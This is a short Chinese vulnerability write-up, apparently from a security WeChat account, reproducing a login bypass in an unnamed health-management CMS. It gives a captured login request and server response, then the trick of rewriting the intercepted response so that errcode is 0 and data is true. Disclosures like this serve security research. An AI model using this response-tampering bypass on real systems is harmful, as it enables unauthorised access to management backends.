前言
某某健康管理CMS存在登录验证绕过
一.漏洞复现
后台登录为这个样子的
这里我们随便输入用户密码和手机,然后用burp suite抓包
POST /FrameWeb/FrameService/Main.ashx?option=func&funcid=login HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0Accept: application/json, text/plain, */*Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/json;charset=utf-8Content-Length: 200Origin: http://127.0.0.1Connection: closeReferer: http://127.0.0.1/FrameWeb/FrameView/Login/Login.htmlCookie: JSESSIONID=B8707667A91CA3E1564158F4112158B5; account=admin; mobile=13800000000; chkpwd=false; employeeName=admin; jobName=%E8%B6%85%E7%BA%A7%E7%AE%A1%E7%90%86%E5%91%98; generalType=2{"_dataid":"login","_type":"","_datatype":"text","_param":{"Account":"123abc","Phone":"13800000000","Pwd":"123456"},"_timestamp":1627660684,"funcid":"login","_sign":"e05b00c8e171f6890ae37539037bea61"}
然后选择拦截返回包
HTTP/1.1 200Server: nginxDate: Fri, 30 Jul 2021 16:00:33 GMTContent-Type: application/json;charset=UTF-8Content-Length: 47Connection: closeAccess-Control-Allow-Credentials: trueAccess-Control-Allow-Origin: http://39.107.192.171Vary: OriginAccess-Control-Expose-Headers: Set-Cookie{"errcode":"1","errmsg":"无此用户",data:{}}
这里我们把errcode参数值改为0,data参数添加true放包即可成功登录
本文始发于微信公众号(F12sec):某某健康管理CMS存在登录验证绕过
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论